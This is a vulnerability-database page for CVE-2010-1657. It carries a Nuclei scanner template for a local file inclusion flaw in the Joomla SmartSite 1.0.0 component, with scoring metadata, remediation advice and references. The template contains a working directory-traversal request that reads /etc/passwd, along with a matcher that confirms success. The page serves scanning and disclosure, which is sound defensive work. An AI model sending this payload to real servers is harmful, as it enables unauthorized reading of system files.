Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1657
HistoryAug 19, 2021 - 1:25 a.m.

Joomla! Component SmartSite 1.0.0 - Local File Inclusion

2021-08-1901:25:16
ProjectDiscovery
github.com
4

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.6 Medium

AI Score

Confidence

Low

0.018 Low

EPSS

Percentile

88.0%

A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1657

info:
  name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: |
    Update to the latest version of Joomla! Component SmartSite or apply the necessary patches to fix the LFI vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1657
    - https://www.exploit-db.com/exploits/12428
    - http://www.vupen.com/english/advisories/2010/1006
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/58175
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2010-1657
    cwe-id: CWE-22
    epss-score: 0.01751
    epss-percentile: 0.87931
    cpe: cpe:2.3:a:recly:com_smartsite:1.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: recly
    product: com_smartsite
  tags: cve,cve2010,joomla,lfi,edb,recly

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f7d70491dc51a14478a027cf92cee4704418b3b61a36897ba1a3f8ea33bea0df02207acc9a7bd2d035f2e228ed04cf180acadef6a88c222bf92e62cb4b1672822672:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

6.6 Medium

AI Score

Confidence

Low

0.018 Low

EPSS

Percentile

88.0%

Related for NUCLEI:CVE-2010-1657